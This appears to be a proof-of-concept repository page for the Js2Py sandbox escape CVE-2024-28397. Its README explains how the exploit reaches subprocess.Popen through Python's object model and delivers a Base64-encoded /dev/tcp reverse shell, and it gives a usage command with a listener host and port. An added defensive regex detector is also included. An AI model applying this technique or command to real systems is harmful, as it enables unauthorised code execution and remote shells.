
CVE-2024-28397 PoC — Js2Py Security Vulnerability

Associated Vulnerability
Title: Js2Py Security Vulnerability (CVE-2024-28397)
Description: Js2Py is a library from the Python Foundation used to translate JavaScript into Python code. Js2Py 0.74 and earlier versions contain a security vulnerability caused by an issue in the js2py.disable_pyimport() component; an attacker can exploit it to execute arbitrary code through crafted API calls.
Description
This repository contains a Proof of Concept (PoC) for CVE-2024-28397, a vulnerability in the js2py library allowing a sandbox escape to achieve remote code execution.
Readme
# CVE-2024-28397-Js2Py-RCE
📌 **Description**

This repository contains a Python-based Proof of Concept (PoC) for CVE-2024-28397, a sandbox escape vulnerability in the Js2Py JavaScript interpreter for Python.
When the target application evaluates untrusted JS code via Js2Py, an attacker can break out of the sandbox and execute arbitrary Python code. This can be leveraged to gain remote code execution (RCE) and a reverse shell on the vulnerable system.

This exploit was inspired by Marven11’s [CVE-2024-28397-js2py-Sandbox-Escape](https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape) project.

---

⚠️ **Disclaimer**

This script is provided for educational and authorized penetration testing purposes only. Unauthorized use of this script against systems you do not own or have explicit permission to test is illegal and unethical. The author assumes no responsibility for misuse or damage caused by this script.

---

🧠 **About the Vulnerability**
- CVE ID: [CVE-2024-28397](https://nvd.nist.gov/vuln/detail/CVE-2024-28397)
- Component: Js2Py sandbox escape
- Impact: Unrestricted access to Python’s object model via `__class__.__base__.__subclasses__`, leading to arbitrary code execution
- Attack Vector: Remote (via exposed HTTP interface evaluating user-controlled JavaScript)

---

🚀 **Features**
- Automatic reverse shell payload delivery via Python RCE
- Inline Base64-encoded shell command execution
- Built-in reverse shell listener with basic PTY stabilization
- Clean output formatting
- Lightweight and dependency-free (except for requests)

---

🔧 **Requirements**
- Python 3.x
- `requests` module (`pip install requests`)
- A Linux system (for `/dev/tcp` reverse shell)
- A target running a vulnerable implementation of Js2Py

---

📦 **Usage**
```
python3 exploit.py --target http://example.htb --lhost 10.10.14.51 --lport 4444
```
- `--target`: The full URL to the vulnerable web app endpoint
- `--lhost`: Your local IP address (used for reverse shell)
- `--lport`: Your local port to receive the shell

---

🛠️ **How It Works**
1. The script prepares a Bash reverse shell, Base64-encodes it, and injects it into a JavaScript payload.
2. The JS payload walks the Python object tree using `__class__.__base__.__subclasses__()` to find `subprocess.Popen`.
3. It uses `Popen` to decode and execute the shell.
4. The attacker’s machine receives the reverse shell and automatically stabilizes it.
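As an added example (not code from the PoC repository), the following Python heuristic lets a defender screen JavaScript submitted to a Js2Py evaluation endpoint for the object-model walk described in the steps above (`__class__.__base__.__subclasses__()`, `Popen`, Base64-decoded commands). The log lines and the `/eval` endpoint name are constructed assumptions.

```python
"""Detection heuristic for CVE-2024-28397-style Js2Py sandbox escapes.

Added example, not part of the PoC repository. Flags JS that reaches for
Python's object model the way the README steps describe. Sample log lines
and the /eval endpoint name are constructed assumptions.
"""
import re
from typing import Dict, List

# Gadget-chain markers taken from the technique described on this page.
# A single marker is suspicious; __class__ together with __subclasses__
# is the escape chain itself and is treated as high confidence.
PATTERNS = {
    "class_attr": re.compile(r"__class__"),
    "base_attr": re.compile(r"__base__|__mro__"),
    "subclasses": re.compile(r"__subclasses__"),
    "popen": re.compile(r"\bPopen\b|\bsubprocess\b"),
    "b64_decode": re.compile(r"base64|b64decode|\batob\b"),
}


def score_js(js: str) -> Dict[str, object]:
    """Return the matched markers and a verdict for one JS snippet."""
    hits = sorted(name for name, rx in PATTERNS.items() if rx.search(js))
    chain = {"class_attr", "subclasses"} <= set(hits)
    verdict = "escape-attempt" if chain else ("suspicious" if hits else "clean")
    return {"verdict": verdict, "hits": hits}


def scan_requests(lines: List[str]) -> List[Dict[str, object]]:
    """Scan 'METHOD PATH BODY' log lines; return one finding per non-clean line."""
    findings = []
    for line in lines:
        body = line.split(" ", 2)[2] if line.count(" ") >= 2 else line
        result = score_js(body)
        if result["verdict"] != "clean":
            findings.append({"line": line, **result})
    return findings


# Constructed sample log lines (endpoint name is an assumption).
SAMPLE_LOG = [
    "POST /eval var total = 2 + 3;",
    "POST /eval x = a.__class__.__base__.__subclasses__();",
    'POST /eval var x = atob("aGVsbG8=");',
]

if __name__ == "__main__":
    for finding in scan_requests(SAMPLE_LOG):
        print(finding["verdict"], finding["hits"], finding["line"])
```

The `suspicious` tier is deliberately noisy (legitimate JS uses `atob`); route it to logging, and alert only on `escape-attempt`.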
File Snapshot

```
[4.0K] /data/pocs/cde797a416267fc9b08fdd6e18ef3a1112a9c4be
├── [4.2K] exploit.py
└── [2.4K] README.md

0 directories, 2 files
```